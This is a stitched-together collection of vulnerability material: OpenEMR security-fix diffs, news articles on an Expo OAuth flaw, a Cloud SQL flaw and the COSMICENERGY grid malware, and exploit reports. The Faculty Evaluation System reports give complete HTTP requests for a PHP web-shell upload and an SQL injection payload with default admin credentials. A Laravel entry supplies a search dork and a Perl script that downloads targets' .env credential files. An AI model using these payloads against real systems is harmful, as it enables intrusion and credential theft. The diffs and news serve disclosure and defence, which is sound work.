Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.1.

Expand Up @@ -120,13 +120,13 @@ function sqlQuery($statement, $link) } }  
echo " <td>$sfname</td>\\n"; echo " <td>$dbase</td>\\n"; echo " <td>" . htmlspecialchars($sfname, ENT\_NOQUOTES) . "</td>\\n"; echo " <td>" . htmlspecialchars($dbase, ENT\_NOQUOTES) . "</td>\\n";  
if (!$config) { echo " <td colspan='3'><a href='setup.php?site=$sfname' class='text-decoration-none'>Needs setup, click here to run it</a></td>\\n"; echo " <td colspan='3'><a href='setup.php?site=" . htmlspecialchars(urlencode($sfname), ENT\_QUOTES) . "' class='text-decoration-none'>Needs setup, click here to run it</a></td>\\n"; } elseif ($errmsg) { echo " <td colspan='3' class='text-danger'>$errmsg</td>\\n"; echo " <td colspan='3' class='text-danger'>" . htmlspecialchars($errmsg, ENT\_NOQUOTES) . "</td>\\n"; } else { // Get site name for display. $row = sqlQuery("SELECT gl\_value FROM globals WHERE gl\_name = 'openemr\_name' LIMIT 1", $dbh); Expand All @@ -152,20 +152,20 @@ function sqlQuery($statement, $link) }  
// Display relevant columns. echo " <td>$openemr\_name</td>\\n"; echo " <td>$openemr\_version</td>\\n"; echo " <td>" . htmlspecialchars($openemr\_name, ENT\_NOQUOTES) . "</td>\\n"; echo " <td>" . htmlspecialchars($openemr\_version, ENT\_NOQUOTES) . "</td>\\n"; if ($v\_database != $database\_version) { echo " <td><a href='sql\_upgrade.php?site=$sfname' class='text-decoration-none'>Upgrade Database</a></td>\\n"; echo " <td><a href='sql\_upgrade.php?site=" . htmlspecialchars(urlencode($sfname), ENT\_QUOTES) . "' class='text-decoration-none'>Upgrade Database</a></td>\\n"; } elseif (($v\_acl > $database\_acl)) { echo " <td><a href='acl\_upgrade.php?site=$sfname' class='text-decoration-none'>Upgrade Access Controls</a></td>\\n"; echo " <td><a href='acl\_upgrade.php?site=" . htmlspecialchars(urlencode($sfname), ENT\_QUOTES) . "' class='text-decoration-none'>Upgrade Access Controls</a></td>\\n"; } elseif (($v\_realpatch != $database\_patch)) { echo " <td><a href='sql\_patch.php?site=$sfname' class='text-decoration-none'>Patch Database</a></td>\\n"; echo " <td><a href='sql\_patch.php?site=" . htmlspecialchars(urlencode($sfname), ENT\_QUOTES) . "' class='text-decoration-none'>Patch Database</a></td>\\n"; } else { echo " <td><i class='fa fa-check fa-lg text-success' aria-hidden='true' ></i></a></td>\\n"; } if (($v\_database == $database\_version) && ($v\_acl <= $database\_acl) && ($v\_realpatch == $database\_patch)) { echo " <td><a href='interface/login/login.php?site=$sfname' class='text-decoration-none'><i class='fa fa-sign-in-alt fa-lg' aria-hidden='true' data-toggle='tooltip' data-placement='top' title ='Login to site $sfname'></i></a></td>\\n"; echo " <td><a href='portal/index.php?site=$sfname' class='text-decoration-none'><i class='fa fa-sign-in-alt fa-lg' aria-hidden='true' data-toggle='tooltip' data-placement='top' title ='Login to site $sfname'></i></a></td>\\n"; echo " <td><a href='interface/login/login.php?site=" . htmlspecialchars(urlencode($sfname), ENT\_QUOTES) . "' class='text-decoration-none'><i class='fa fa-sign-in-alt fa-lg' aria-hidden='true' data-toggle='tooltip' data-placement='top' title ='Login to site " . htmlspecialchars($sfname, ENT\_QUOTES) . "'></i></a></td>\\n"; echo " <td><a href='portal/index.php?site=" . htmlspecialchars(urlencode($sfname), ENT\_QUOTES) . "' class='text-decoration-none'><i class='fa fa-sign-in-alt fa-lg' aria-hidden='true' data-toggle='tooltip' data-placement='top' title ='Login to site " . htmlspecialchars($sfname, ENT\_QUOTES) . "'></i></a></td>\\n"; } else { echo " <td><i class='fa fa-ban fa-lg text-secondary' aria-hidden='true'></i></td>\\n"; echo " <td><i class='fa fa-ban fa-lg text-secondary' aria-hidden='true'></i></td>\\n"; Expand Down

CVE-2023-2947: fix: bug fix (#6296) · openemr/openemr@8d2d601

 Code Injection in GitHub repository openemr/openemr prior to 7.0.1.

Expand Up @@ -43,7 +43,7 @@ require\_once("$srcdir/forms.inc.php"); require\_once("$srcdir/appointments.inc.php");  
use OpenEMR\\Core\\Header; use OpenEMR\\Services\\AppointmentService;  
// Things that might be passed by our opener. // Expand All @@ -64,6 +64,24 @@ exit(); }  
if (!empty($\_POST\['form\_pid'\])) { if ($\_POST\['form\_pid'\] != $\_SESSION\['pid'\]) { echo js\_escape("error"); exit(); }  
if (! getAvailableSlots($\_POST\['form\_date'\], date('Y-m-d', strtotime("+1 year " . $\_POST\['form\_date'\])), $\_POST\['form\_provider\_ae'\])) { echo js\_escape("error"); exit(); }  
$appointment\_service = (new AppointmentService())->getOneCalendarCategory($\_POST\['form\_category'\]); if (($\_POST\['form\_duration'\] \* 60) != ($appointment\_service\[0\]\['pc\_duration'\])) { echo js\_escape("error"); exit(); } }  
if ($date) { $date = substr($date, 0, 4) . '-' . substr($date, 4, 2) . '-' . substr($date, 6); } else { Expand Down Expand Up @@ -135,7 +153,7 @@ $event\_date = fixDate($\_POST\['form\_date'\]);  
// Compute start and end time strings to be saved. if ($\_POST\['form\_allday'\]) { if ($\_POST\['form\_allday'\] ?? null) { $tmph = 0; $tmpm = 0; $duration = 24 \* 60; Expand Down Expand Up @@ -165,7 +183,7 @@  
// More garbage, but this time 1 character of it is used to save the // repeat type. if ($\_POST\['form\_repeat'\]) { if ($\_POST\['form\_repeat'\] ?? null) { $recurrspec = 'a:5:{' . 's:17:"event\_repeat\_freq";s:1:"' . $\_POST\['form\_repeat\_freq'\] . '";' . 's:22:"event\_repeat\_freq\_type";s:1:"' . $\_POST\['form\_repeat\_type'\] . '";' . Expand All @@ -185,7 +203,7 @@ //for example monday, or thursday. We set the start date on the first day of the week //that the event is scheduled. For example if you set the event to repeat on each monday //the start date of the event will be set on the first monday after the day the event is scheduled if ($\_POST\['form\_repeat\_type'\] == 5) { if (($\_POST\['form\_repeat\_type'\] ?? null) == 5) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Tue") { Expand All @@ -201,7 +219,7 @@ } elseif ($edate == "Sun") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 6) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 6) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Wed") { Expand All @@ -217,7 +235,7 @@ } elseif ($edate == "Mon") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 7) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 7) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Thu") { Expand All @@ -233,7 +251,7 @@ } elseif ($edate == "Tue") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 8) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 8) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Fri") { Expand All @@ -249,7 +267,7 @@ } elseif ($edate == "Wed") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 9) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 9) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Sat") { Expand Down Expand Up @@ -305,7 +323,7 @@ "'" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "'" . add\_escape\_custom($row\['pc\_multiple'\]) . "', " . "'" . add\_escape\_custom($to\_be\_inserted) . "', " . "'" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "NOW(), " . "'" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . Expand All @@ -332,7 +350,7 @@ foreach ($\_POST\['form\_provider\_ae'\] as $provider) { sqlStatement("UPDATE openemr\_postcalendar\_events SET " . "pc\_catid = '" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "pc\_pid = '" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "pc\_pid = '" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "pc\_title = '" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "pc\_time = NOW(), " . "pc\_hometext = '" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . Expand Down Expand Up @@ -365,22 +383,22 @@ sqlStatement("UPDATE openemr\_postcalendar\_events SET " . "pc\_catid = '" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "pc\_aid = '" . add\_escape\_custom($prov) . "', " . "pc\_pid = '" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "pc\_pid = '" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "pc\_title = '" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "pc\_time = NOW(), " . "pc\_hometext = '" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . "pc\_informant = '" . add\_escape\_custom($\_SESSION\['providerId'\]) . "', " . "pc\_eventDate = '" . add\_escape\_custom($event\_date) . "', " . "pc\_endDate = '" . add\_escape\_custom(fixDate($\_POST\['form\_enddate'\])) . "', " . "pc\_endDate = '" . add\_escape\_custom(fixDate($\_POST\['form\_enddate'\] ?? '')) . "', " . "pc\_duration = '" . add\_escape\_custom(($duration \* 60)) . "', " . "pc\_recurrtype = '" . ($\_POST\['form\_repeat'\] ? '1' : '0') . "', " . "pc\_recurrtype = '" . (($\_POST\['form\_repeat'\] ?? null) ? '1' : '0') . "', " . "pc\_recurrspec = '" . add\_escape\_custom($recurrspec) . "', " . "pc\_startTime = '" . add\_escape\_custom($starttime) . "', " . "pc\_endTime = '" . add\_escape\_custom($endtime) . "', " . "pc\_alldayevent = '" . add\_escape\_custom($\_POST\['form\_allday'\]) . "', " . "pc\_alldayevent = '" . add\_escape\_custom(($\_POST\['form\_allday'\] ?? '')) . "', " . "pc\_apptstatus = '" . add\_escape\_custom($\_POST\['form\_apptstatus'\]) . "', " . "pc\_prefcatid = '" . add\_escape\_custom($\_POST\['form\_prefcat'\]) . "', " . "pc\_facility = '" . (int)$\_POST\['facility'\] . "' " . // FF stuff "pc\_prefcatid = '" . add\_escape\_custom(($\_POST\['form\_prefcat'\] ?? '')) . "', " . "pc\_facility = '" . (int)($\_POST\['facility'\] ?? null) . "' " . // FF stuff "WHERE pc\_eid = '" . add\_escape\_custom($eid) . "'"); }  
Expand Down Expand Up @@ -416,7 +434,7 @@ "'" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "'" . add\_escape\_custom($new\_multiple\_value) . "', " . "'" . add\_escape\_custom($provider) . "', " . "'" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "NOW(), " . "'" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . Expand Down Expand Up @@ -446,24 +464,24 @@ ") VALUES ( " . "'" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_provider\_ae'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "NOW(), " . "'" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['providerId'\]) . "', " . "'" . add\_escape\_custom($event\_date) . "', " . "'" . add\_escape\_custom(fixDate($\_POST\['form\_enddate'\])) . "', " . "'" . add\_escape\_custom(fixDate(($\_POST\['form\_enddate'\] ?? ''))) . "', " . "'" . add\_escape\_custom(($duration \* 60)) . "', " . "'" . ($\_POST\['form\_repeat'\] ? '1' : '0') . "', " . "'" . (($\_POST\['form\_repeat'\] ?? null) ? '1' : '0') . "', " . "'" . add\_escape\_custom($recurrspec) . "', " . "'" . add\_escape\_custom($starttime) . "', " . "'" . add\_escape\_custom($endtime) . "', " . "'" . add\_escape\_custom($\_POST\['form\_allday'\]) . "', " . "'" . add\_escape\_custom(($\_POST\['form\_allday'\] ?? '')) . "', " . "'" . add\_escape\_custom($\_POST\['form\_apptstatus'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_prefcat'\]) . "', " . "'" . add\_escape\_custom(($\_POST\['form\_prefcat'\] ?? null)) . "', " . "'" . add\_escape\_custom($locationspec) . "', " . "1, " . "1, " . (int)$\_POST\['facility'\] . ")"); // FF stuff "1, " . (int)($\_POST\['facility'\] ?? null) . ")"); // FF stuff } // INSERT single } // else - insert } elseif (($\_POST\['form\_action'\] ?? null) == "delete") { Expand Down Expand Up @@ -496,7 +514,7 @@ $note .= ". " . xl("Use Portal Dashboard to confirm with patient."); $title = xl("Patient Reminders"); $user = sqlQueryNoLog("SELECT users.username FROM users WHERE authorized = 1 And id = ?", array($\_POST\['form\_provider\_ae'\])); $rtn = addPnote($\_POST\['form\_pid'\], $note, 1, 1, $title, $user\['username'\], '', 'New'); $rtn = addPnote($\_SESSION\['pid'\], $note, 1, 1, $title, $user\['username'\], '', 'New');  
$\_SESSION\['whereto'\] = '#appointmentcard'; header('Location:./home.php'); Expand Down Expand Up @@ -657,12 +675,12 @@ <form method\='post' name\='theaddform' id\='theaddform' action\='add\_edit\_event\_user.php?eid=<?php echo attr\_url($eid); ?>'\> <div class\="col-12"\> <input type\="hidden" name\="form\_action" id\="form\_action" value\="" /> <input type\='hidden' name\='form\_title' id\='form\_title' value\='<?php echo $row\['pc\_catid'\] ? attr($row\['pc\_title'\]) : xla("Office Visit"); ?>' /> <input type\='hidden' name\='form\_apptstatus' id\='form\_apptstatus' value\='<?php echo $row\['pc\_apptstatus'\] ? attr($row\['pc\_apptstatus'\]) : "^" ?>' /> <input type\='hidden' name\='form\_title' id\='form\_title' value\='<?php echo ($row\['pc\_catid'\] ?? '') ? attr($row\['pc\_title'\]) : xla("Office Visit"); ?>' /> <input type\='hidden' name\='form\_apptstatus' id\='form\_apptstatus' value\='<?php echo ($row\['pc\_apptstatus'\] ?? '') ? attr($row\['pc\_apptstatus'\] ?? '') : "^" ?>' /> <div class\="row form-group"\> <div class\="input-group col-12 col-md-6"\> <label class\="mr-2" for\="form\_category"\><?php echo xlt('Visit'); ?>:</label\> <select class\="form-control mb-1" onchange\='set\_category()' id\='form\_category' name\='form\_category' value\='<?php echo ($row\['pc\_catid'\] > "") ? attr($row\['pc\_catid'\]) : '5'; ?>'\> <select class\="form-control mb-1" onchange\='set\_category()' id\='form\_category' name\='form\_category' value\='<?php echo (($row\['pc\_catid'\] ?? '') > "") ? attr($row\['pc\_catid'\]) : '5'; ?>'\> <?php echo $catoptions ?> </select\> </div\> Expand All @@ -684,7 +702,7 @@ </div\> <div class\="input-group"\> <label class\="mr-2" for\="form\_duration"\><?php echo xlt('Duration'); ?></label\> <input class\="form-control" type\='text' size\='1' id\='form\_duration' name\='form\_duration' value\='<?php echo $row\['pc\_duration'\] ? ($row\['pc\_duration'\] \* 1 / 60) : attr($thisduration) ?>' readonly /> <input class\="form-control" type\='text' size\='1' id\='form\_duration' name\='form\_duration' value\='<?php echo ($row\['pc\_duration'\] ?? '') ? ($row\['pc\_duration'\] \* 1 / 60) : attr($thisduration) ?>' readonly /> <span class\="input-group-append"\> <span class\="input-group-text"\><?php echo "&nbsp;" . xlt('minutes'); ?></span\> </span\> Expand Down Expand Up @@ -730,7 +748,7 @@ </div\> </div\> <div class\="row input-group my-1"\> <?php if ($\_GET\['eid'\] && $row\['pc\_apptstatus'\] !== 'x') { ?> <?php if (($\_GET\['eid'\] ?? null) && $row\['pc\_apptstatus'\] !== 'x') { ?> <input type\='button' id\='form\_cancel' class\='btn btn-danger' onsubmit\='return false' value\='<?php echo xla('Cancel Appointment'); ?>' onclick\="cancel\_appointment()" /> <?php } ?> <input type\='button' name\='form\_save' class\='btn btn-success' onsubmit\='return false' value\='<?php echo xla('Save'); ?>' onclick\="validate()" /> Expand Down

CVE-2023-2943: bug fix (#6079) · openemr/openemr@c1c0805

A critical security vulnerability has been disclosed in the Open Authorization (OAuth) implementation of the application development framework Expo.io.
The shortcoming, assigned the CVE identifier CVE-2023-28131, has a severity rating of 9.6 on the CVSS scoring system. API security firm Salt Labs said the issue rendered services using the framework susceptible to credential leakage, which could

API Security / Vulnerability

A critical security vulnerability has been disclosed in the Open Authorization (OAuth) implementation of the application development framework Expo.io.

The shortcoming, assigned the CVE identifier CVE-2023-28131, has a severity rating of 9.6 on the CVSS scoring system. API security firm Salt Labs said the issue rendered services using the framework susceptible to credential leakage, which could then be used to hijack accounts and siphon sensitive data.

Under certain circumstances, a threat actor could have taken advantage of the flaw to perform arbitrary actions on behalf of a compromised user on various platforms such as Facebook, Google, or Twitter.

Expo, similar to Electron, is an open source platform for developing universal native apps that run on Android, iOS, and the web.

It's worth noting that for the attack to be successful, sites and applications using Expo should have configured the AuthSession Proxy setting for single sign-on (SSO) using a third-party provider such as Google and Facebook.

Put differently, the vulnerability could be leveraged to send the secret token associated with a sign-in provider (e.g., Facebook) to an actor-controlled domain and use it to seize control of the victim's account.

This, in turn, is accomplished by tricking the targeted user into clicking on a specially crafted link that could be sent via traditional social engineering vectors like email, SMS messages, or a dubious website.

Expo, in an advisory, said it deployed a hotfix within hours of responsible disclosure on February 18, 2023. It's also recommended that users migrate from using AuthSession API proxies to directly registering deep link URL schemes with third-party authentication providers to enable SSO features.

"The vulnerability would have allowed a potential attacker to trick a user into visiting a malicious link, logging in to a third-party auth provider, and inadvertently revealing their third-party auth credentials," Expo's James Ide said.

"This was because auth.expo.io used to store an app's callback URL before the user explicitly confirmed they trust the callback URL."

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The disclosure follows the discovery of similar OAuth issues in Booking.com (and its sister site Kayak.com) that could have been leveraged to take control of a user's account, gain full visibility into their personal or payment-card data, and perform actions on the victim's behalf.

The findings also come weeks after Swiss cybersecurity company Sonar detailed a path traversal and an SQL injection flaw in the Pimcore enterprise content management system (CVE-2023-28438) that an adversary can abuse to run arbitrary PHP code on the server with the permissions of the webserver.

Sonar, back in March 2023, also revealed an unauthenticated, stored cross-site scripting vulnerability impacting LibreNMS versions 22.10.0 and prior that could be exploited to gain remote code execution when Simple Network Management Protocol (SNMP) is enabled.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical OAuth Vulnerability in Expo Framework Allows Account Hijacking

A new security flaw has been disclosed in the Google Cloud Platform's (GCP) Cloud SQL service that could be potentially exploited to obtain access to confidential data.
"The vulnerability could have enabled a malicious actor to escalate from a basic Cloud SQL user to a full-fledged sysadmin on a container, gaining access to internal GCP data like secrets, sensitive files, passwords, in addition

Data Safety / Cloud Security

A new security flaw has been disclosed in the Google Cloud Platform's (GCP) Cloud SQL service that could be potentially exploited to obtain access to confidential data.

"The vulnerability could have enabled a malicious actor to escalate from a basic Cloud SQL user to a full-fledged sysadmin on a container, gaining access to internal GCP data like secrets, sensitive files, passwords, in addition to customer data," Israeli cloud security firm Dig said.

Cloud SQL is a fully-managed solution to build MySQL, PostgreSQL, and SQL Server databases for cloud-based applications.

The multi-stage attack chain identified by Dig, in a nutshell, leveraged a gap in the cloud platform's security layer associated with SQL Server to escalate the privileges of a user to that of an administrator role.

The elevated permissions subsequently made it possible to abuse another critical misconfiguration to obtain system administrator rights and take full control of the database server.

From there, a threat actor could access all files hosted on the underlying operating system, enumerate files, and extract passwords, which could then act as a launchpad for further attacks.

"Gaining access to internal data like secrets, URLs, and passwords can lead to exposure of cloud providers' data and customers' sensitive data which is a major security incident," Dig researchers Ofir Balassiano and Ofir Shaty said.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

Following responsible disclosure in February 2023, the issue was addressed by Google in April 2023.

The disclosure comes as Google announced the availability of its Automatic Certificate Management Environment (ACME) API for all Google Cloud users to automatically acquire and renew TLS certificates for free.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Severe Flaw in Google Cloud's Cloud SQL Service Exposed Confidential Data

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin@admin.com/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=save\_user

Loophole location: Faculty Evaluation System's "/eval/ajax.php?action=save\_user" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /eval/ajax.php?action\=save\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/eval/index.php?page=edit\_user&id=1
Content-Length: 818
Content-Type: multipart/form-data; boundary=---------------------------1037163726497
Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r
Connection: close
\-----------------------------1037163726497
Content-Disposition: form-data; name="id"
1
\-----------------------------1037163726497
Content-Disposition: form-data; name="firstname"
Administrator
\-----------------------------1037163726497
Content-Disposition: form-data; name="lastname"
a
\-----------------------------1037163726497
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------1037163726497
Content-Disposition: form-data; name="email"
admin@admin.com
\-----------------------------1037163726497
Content-Disposition: form-data; name="password"
\-----------------------------1037163726497
Content-Disposition: form-data; name="cpass"
\-----------------------------1037163726497--

The uploaded file path has returned in response.

The files will be uploaded to this directory \\eval\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_task.php?id=

Vulnerability location: /eval/admin/manage\_task.php?id=, id

Vulnerability sql: $qry = $conn->query("SELECT * FROM task_list where id = ".$_GET['id'])->fetch_array();

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_task.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-33439: bug_report/SQLi-1.md at main · F14me7wq/bug_report

Laravel version 10.11 suffers from database disclosure and information leakage vulnerabilities.

====================================================================================================================================  
| # Title     : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://laravel.com/                                                                                               |    
| # Dork      : db_password filetype:env                                                                                           |  
                "Whoops! There was an error."                                                                                      |  
====================================================================================================================================

note : 

[+] 1 : 

 Laravel's default .env file contains some common configuration values that may differ based on whether your application   
is running locally or on a production web server. These values are then retrieved from various Laravel configuration files   
within the config directory using Laravel's env function.

[+] 2 :  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+] Poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )

[+] https://127.0.0.1/lala/.env 

====================================================================================================================================  
| # Title     : Laravel 10.11 sensitive information disclosure Vulnerability                                                       |  
====================================================================================================================================

poc : 

[+]  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+]  Dorking İn Google Or Other Search Enggine .

[+]  https://127.0.0.1/lalaland/categorie/avant_apres/

[+]  https://youtu.be/tz_w563Nyac  

====================================================================================================================================  
| # Title     : Laravel 10.11 Database Disclosure Exploit                                                                          |  
====================================================================================================================================

poc :

[-] Download the configuration file:

    The following Perl exploit will attempt to download the .env file  
    The .env file contains some common configuration values and connection information to the script database  
    Through the code you can control where to save the downloaded file .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/.env \n";  
print "[+] usage2 : perl $0 localhost /.env \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File=".env";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/.env");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Laravel 10.11 Database Disclosure / Information Disclosure

A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed.
Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild.
"The

A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed.

Google-owned threat intelligence firm Mandiant dubbed the malware **COSMICENERGY**, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild.

"The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.

COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc.

Mandiant said that there are circumstantial links that it may have been developed as a red teaming tool by Russian telecom firm Rostelecom-Solar to simulate power disruption and emergency response exercises that were held in October 2021.

This raises the possibility that the malware was either developed to recreate realistic attack scenarios against energy grid assets to test defenses or another party reused code associated with the cyber range.

The second alternative is not unheard of, especially in light of the fact that threat actors are known to adapt and repurpose legitimate red team and post-exploitation tools for malicious ends.

COSMICENERGY's features are comparable to that of Industroyer – which has been attributed to the Kremlin-backed Sandworm group – owing to its ability to exploit an industrial communication protocol called IEC-104 to issue commands to RTUs.

"Leveraging this access, an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption," Mandiant said.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

This is accomplished by means of two components called PIEHOP and LIGHTWORK, which are two disruption tools written in Python and C++, respectively, to transmit the IEC-104 commands to the connected industrial equipment.

Another notable aspect of the industrial control system (ICS) malware is the lack of intrusion and discovery capabilities, meaning it requires the operator to perform an internal reconnaissance of the network to determine the IEC-104 device IP addresses to be targeted.

To pull off an attack, a threat actor would therefore have to infect a computer within the network, find a Microsoft SQL Server that has access to the RTUs, and obtain its credentials.

